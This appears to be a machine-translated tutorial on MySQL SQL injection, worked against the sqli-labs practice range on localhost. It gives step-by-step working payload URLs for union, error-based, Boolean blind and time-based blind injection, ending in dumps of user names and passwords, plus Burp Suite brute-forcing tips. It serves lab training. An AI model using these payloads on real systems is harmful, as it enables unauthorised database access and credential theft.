Article directory
- 1. Common functions of MYSQL database
- 2. MYSQL default 4 system databases and key libraries and tables
- 3. Determine the database type
- 4. Joint query injection
-
- 1. Specific steps (shooting range demonstration):
-
- 1) First determine the injection point
- 2) Determine whether it is numeric or character type
- 3) To determine the number of columns of injection points
- 4) Get the display position of the database in the web page
- 5) Construct POC to query user name and database name
- 6) Check all table names in the database
- 7) Find out all field names of a specific table
- 8) Query all data in the users table
- 9) Use another way to view the data
- 5. Error injection
-
- 1. Commonly used error reporting functions in MYSQL:
- 2. Error injection steps (shooting range demonstration)
-
- 1) Make sure that database errors will be displayed on the page
- 2) Find the injection point (refer to joint injection)
- 3) Determine whether it is numeric or character type (refer to joint injection)
- 4) Use the error reporting function to construct the wheel
- 5) Get the database name and user name
- 6) Get all table names
- 7) Get the field name of a specific table (refer to union injection)
- 8) Obtain data from a specific table (refer to joint injection)
- 3. Error injection has a string length limit
- 6. Blind bet
-
- 1. Boolean type blind injection
- 2. Boolean blind injection steps:
-
- 1) Find the injection point (refer to joint injection)
- 2) Construct the wheel
- 3) Get the current user name and database name length
- 4) Get the current user name and database name
- 5) Get the length of all table names in the current database
- 6) Get the names of all table names in the current database
- 7) Get the total length of all field names in the users table
- 8) Get all field names of the users table
- 9) Get the total length of each row of all data in the users table
- 10) Obtain the purpose data of users table
- 3. Time blind injection
- 4. Time blind injection steps:
-
- 1) Find the injection point (refer to joint injection)
- 2) Determine whether it is numeric or character type (refer to joint injection)
- 3) Test whether the sleep function is filtered and whether it will be executed
- 4) Get the current username and database length
- 5) Get the current user name and database name
- 6) Get the total string length of all table names in the current database (refer to Boolean blind injection)
- 7) Get all the table names of the current database (refer to Boolean blind injection)
- 8) Get the total string length of all field names in the users table (refer to Boolean blind injection)
- 9) Get all field names of the users table (refer to Boolean blind injection)
- 10) Obtain the target data of the users table (refer to Boolean blind injection)
1. Common functions of MYSQL database
2. MYSQL default 4 system databases and key libraries and tables
Key libraries:information_schema
3. Determine the database type
For PHP websites, commonly used databases are MYSQL and PostgreSQL.
Determine the database type:
- MYSQL:3306
- PostgreSQL:5432
- MSSQL:1433
4. Joint query injection
使用场景:数据库在页面中存在显示位。
UNION操作符
Used to combine the results of two or more SELECT statements into a result set. The premise is that there must be two choices 相同列
.
1. Specific steps (shooting range demonstration):
1) First determine the injection point
As follows:
Here you can determine that the injection point is at the id position
2) Determine whether it is numeric or character type
Use the 1/1 and 1/0 methods for testing.
Neither 1/1 nor 1/0 reports an error, which means there is no response. Explain 不是数字型
.
Directly add 1 single quote and 2 single quotes to test.
An error will be reported for 1 single quote, but no error will be reported for 2 single quotes. Please explain 这是字符型
.
3) To determine the number of columns of injection points
Use order by; order by is used for sorting. If order by 3 does not report an error, order by
4 reports an error, which means that the table only has 3 columns.
As follows:
POC used:
http://localhost/Less-1/?id=1' order by 4--+
Corresponding SQL statement:
select * from table name (unknown) where
order by 4
;
#Let him report an error
4) Get the display position of the database in the web page
After knowing the number of columns, you need to get the database in the web page 显示位
(that is, the fields displayed on the web page). You can use union to splice error queries and self-constructed select statements.
As follows:
http://localhost/Less-1/?id=1
Corresponding SQL statement:
select * from table name (unknown) where id=1;
Shown on this page:
Your Login name: Dumb
Your Password: Dumb
http://localhost/Less-1/?id=2
Corresponding SQL statement:
select * from table name (unknown) where id=2;
The page shows:
Your Login name: Angelina
Your Password: I-kill-you
Construct an incorrect select query field, for example, change id=1 to id=-1
using the POC:
http://localhost/ Less-1/?id=-1' union select 1,2,3 --+
Corresponding SQL statement:
select * from table name (unknown) where id=
-1 union select 1,2,3
;
The page shows:
Your Login name: 2
Your Password: 3
In this way, we know 显示位
that they are the 2nd and 3rd columns of the data table.
5) Construct POC to query user name and database name
Construct the function to be queried on the display position, such as the current user name and database name.
Construct the POC:
http://localhost/ Less-1/? id=-1'
union select 1,user(),database()--+
Corresponding SQL statement:
select * from table name (unknown) where id=
-1 union select 1,user(),database()
;
The page shows:
Your Login name: root@localhost
Your Password: security
This way I know the username and database name of the current database.
6) Check all table names in the database
POC used:
http://localhost/ Less-1/? id=-1' union
select 1,2,table_name from information_schema.tables where table_schema='security'--+
Corresponding SQL statement:
select * from table name (unknown) where id=-1 union select 1,2,
table_name from information_schema.tables where table_schema='security'
;
The above will only output the first table name email, but not all table names.
Output all table names and use group_concat()函数
to splice the output.
POC used:
http://localhost/ Less-1/? id=-1'
union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
Corresponding SQL statement:
select * from table name (unknown) where
id=-1
union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'
;
In this way, you will know the names of all the tables in the security database: emails, referers, uagents, users
7) Find out all field names of a specific table
POC used:
http://localhost/ Less-1/? id=-1' union
select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security'--+
Corresponding SQL statement:
select * from table name (unknown) where
id=-1
union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security'
;
Now all the field names of all tables in the security database are output here.
Now there is another problem, that is, I only want to know the field names of sensitive data tables, such as the field names in the users table. At this time, I need to
use: POC:
http://localhost/ Less-1/? id=-1' union
select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'--+
Corresponding SQL statement:
select * from table name (unknown) where id=-1 union select 1,2,
group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'
;
Now you know all the field names of the users table. Suppose you know the fields: id, username, password.
8) Query all data in the users table
POC used:
http:// localhost/ Less-1/?id=-1' union select 1,group_concat(username), group_concat(password) from users--+
Corresponding SQL statement:
select * from users where id=-1 union select 1,
group_concat(username), group_concat(password) from users
;
In this way, all student names and passwords have been found, and at the same time, we also know that the table displayed in the display bit is the users table.
Beautify it:
POC used:
http:// localhost/ Less-1/?id=-1' union select 1,2,group_concat(username,'^',password) from users--+
Corresponding SQL statement:
select * from users where id=-1 union select 1,2,
group_concat(username,'^',password) from users
;
9) Use another way to view the data
You can also use the group_concat() function concat()+limit
to view table data.
POC used:
http:// localhost/ Less-1/?id=-1' union select 1,2,group_concat(username,'^',password) from users limit 0,1--+
Corresponding SQL statement:
select * from users where id=-1 union select 1,2,
group_concat(username,'^',password) from users limit 0,1
;
This way you can look at them one by one.
5. Error injection
使用场景:数据库错误提示会在页面上显示。
1. Commonly used error reporting functions in MYSQL:
1)floor( )
Common injection syntax formats:
select * from test where id=1 and (select 1 from (select count(*),concat(user(),
floor
(rand(0)*2)) x from information_schema.tables group by x) a);
2)extractvalue( )
extractvalue(xml_frag, xpath_expr)
Extract a value from an xml string using xpath syntax.
xml_frag : The name of the xml document object, which is a string type.
xpath_expr : Path using xpath syntax format.
If xpath_expr parameter 不符合xpath格式,就会报错
. It~ 符号(ascii编码值:0x7e)
does not exist in the xpath format, so once the ~ symbol is used in the xpath_expr parameter, an error will be reported.
Common injection syntax formats:
select * from test where id=1 and (
extractvalue
(1,concat(0x7e
,(select user()),0x7e
),1));
3)updatexml( )
Common injection syntax formats:
select * form test where id=1 and (
updatexml
(1,concat(0x7e
,(select user())),1));
4)geometrycollection( )
Common injection syntax formats:
select * from test where id=1 and
geometrycollection
((select * from(select user())a)b));
5)multipoint( )
Common injection syntax formats:
select * from test where id=1 and
multipoint
((select * from(select user())a)b));
6)polygon( )
Common injection syntax formats:
select * from test where id=1 and
polygon
((select * from(select user())a)b));
7)multipolygon( )
Common injection syntax formats:
select * from test where id=1 and
multipolygon
((select * from(select user())a)b));
8) line string( )
Common injection syntax formats:
select * from test where id=1 and
linestring
((select * from(select user())a)b));
9)multilinestring()
Common injection syntax formats:
select * from test where id=1 and
multilinestring
((select * from(select user())a)b));
10)exp( )
Common injection syntax formats:
select * from test where id=1 and
exp
(~(select * from(select user())a));
11)gtid_subset( )
Common injection syntax formats:
select
gtid_subset
(user(),1);
2. Error injection steps (shooting range demonstration)
1) Make sure that database errors will be displayed on the page
2) Find the injection point (refer to joint injection)
3) Determine whether it is numeric or character type (refer to joint injection)
4) Use the error reporting function to construct the wheel
It is used here updatexml()函数
. If the second parameter of this function contains special characters, an error will be reported. Here 0x7e is the URL encoding of "~".
POC used:
http://localhost/ Less-1/?id=1' and updatexml(1,0x7e,1)--+
Corresponding SQL statement:
select * from users where id=1 and
updatexml(1,0x7e,1)
;
5) Get the database name and user name
POC used:
http://localhost/ Less-1/?id=1' and updatexml(1,concat(0x7e,database()),1)--+
Corresponding SQL statement:
select * from users where id=1 and
updatexml(1,concat(0x7e,database()),1)
;
6) Get all table names
POC used:
http://localhost/ Less-1/?id=1' and updatexml(1, concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'))
,1)–+
Corresponding SQL statement:
select * from users where id=1 and updatexml(1,
concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'))
,1);
7) Get the field name of a specific table (refer to union injection)
8) Obtain data from a specific table (refer to joint injection)
3. Error injection has a string length limit
Commonly used functions for error injection usually have string length restrictions 最长输出32位
. If you use the group_concat() function directly, the output will be incomplete.
Example:
POC used:
http://localhost/Less-1/?id=1' and updatexml(1, concat(0x7e,(select group_concat(username,'^',password) from users))
,1) --+
In this way, only the content of 32 string lengths can be output, and the entire content cannot be output;
At this time, you need to use limit to operate and output one by one:
POC used:
http://localhost/Less-1/?id=1' and updatexml(1, concat
(0x7e,(select concat(username, '^',password) from users limit 0,1
)),1) --+
6. Blind bet
1. Boolean type blind injection
Usage scenario: There is no display space on the page, and database query errors will not be displayed on the page. There will only be two page prompts: correct query and query error, such as the following situation:
Normal, true
Add 1 single quote, which is false
Add 2 single quotes to be true
2. Boolean blind injection steps:
1) Find the injection point (refer to joint injection)
2) Construct the wheel
POC used:
http://localhost/Less-8/?id=1' and 1=if(1=1,1,0)--+
POC used:
http://localhost/Less-8/?id=1' and 1=if(1=2,1,0)--+
3) Get the current user name and database name length
POC used:
http://localhost/Less-8/?id=1' and 1= if(length(user())=8,1,0)--+
Then you can use BP to blast the length.
In this way, you can guess that the username string length is 14. Using the same method, you can find that the length of the current database name is 8.
4) Get the current user name and database name
Method 1:
http://localhost/Less-8/?id=1' and 1=if(mid(user(),1,1)='q',1,0)--+
You can also use BP blasting
to blast two payloads
First blast position, just use numbers
For the second explosive character, add English letters + numbers + special symbols. Pay attention to whether the server is case-sensitive.
In this way, it is exploded and the current user name is: root@localhost. The current database name can be obtained in the same way: security
Method 2:
When the interception function is disabled and cannot be used, then use like+‘_’
the example above. I already know that the string length of the current user name is 14, and I need to get the name of the user name.
The POC used:
http://localhost/Less- 8/?id=1' and 1= if(user()+like+'______________',1,0)--+
The return value here is true. Because the underscore "_" in regular expressions can represent any character.
In this way, we can use BP to blast bit by bit to obtain the corresponding user name.
5) Get the length of all table names in the current database
Construct POC:
http://localhost/Less-8/?id=1' and length((select group_concat(table_name) from information_schema.tables where table_schema='security'))=10--+
Using BP blasting,
the length obtained here is 29 bits.
6) Get the names of all table names in the current database
Construct POC:
http://localhost/Less-8/?id=1' and mid((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,1)='a'--+
Use BP to blast.
The first payload mentioned above is known to be 29, so the dictionary selects 29.
The second payload dictionary adds English letters + numbers + special symbols. Pay attention to whether the server is case-sensitive.
Okay, so you know that all the table names are: emails, referers, uagents, users
7) Get the total length of all field names in the users table
Construct POC:
http://localhost/Less-8/?id=1' and length((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'))=10--+
Same BP blasting.
In this way, we know that the total string length of the field names of the users table is 20
8) Get all field names of the users table
Construct POC:
http://localhost/Less-8/?id=1' and mid((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),1,1)='a' --+
Also using BP blasting,
the field names of the users table are obtained: id, username, password
9) Get the total length of each row of all data in the users table
Construct POC:
http://localhost/Less-8/?id=1' and length((select concat(username,'^',password) from users limit 0,1))=10--+
Start using BP blasting.
In this way, you will know that the table has 13 rows in total, and the corresponding string length after concat splicing of each row.
10) Obtain the purpose data of users table
Since we already know the field names of the table, the number of data rows, and the total string length after splicing each row, we can blast it row by row.
POC used:
http://localhost/Less-8/?id=1 ' and mid((select concat(username,'^',password) from users limit 0,1),1,1)='a' --+
I won’t go into details about the specific BP blasting, the operation is similar.
3. Time blind injection
There is only one return value for the page: true. No matter what value is entered, the return situation will be handled normally. Add a specific time function ( sleep
) to 返回的时间差
determine whether the injected statement is correct by viewing the web page.
For example:
4. Time blind injection steps:
1) Find the injection point (refer to joint injection)
2) Determine whether it is numeric or character type (refer to joint injection)
3) Test whether the sleep function is filtered and whether it will be executed
The corresponding time of sleep(1) is 13158 milliseconds
The corresponding time of sleep(0) is 16 milliseconds
This shows that the sleep() function will be executed
4) Get the current username and database length
POC used:
http://localhost/Less-48/?sort=1 and if(length(user())=10,sleep(1),1)--+
Here is if the predicted length is sufficient, sleep(1) will be executed.
Explode using BP
下面需要勾选响应时间
There is an additional list of options. Since sleep(1) is executed correctly, the one with the longest response time is the correct result, which is 14 here. In the same way, the length of the exploded database name is 8.
5) Get the current user name and database name
http://localhost/Less-48/?sort=1 and if(mid(user(),1,1)='a',sleep(1),1)--+
Then use BP to blast
the second blasting payload dictionary. Pay attention to adding English letters + numbers + special symbols into it. Pay attention to whether the server is case-sensitive.
It can be seen here that the exploded user names in order are: root@localhost; similarly, the database name obtained by blasting using the same method is: security.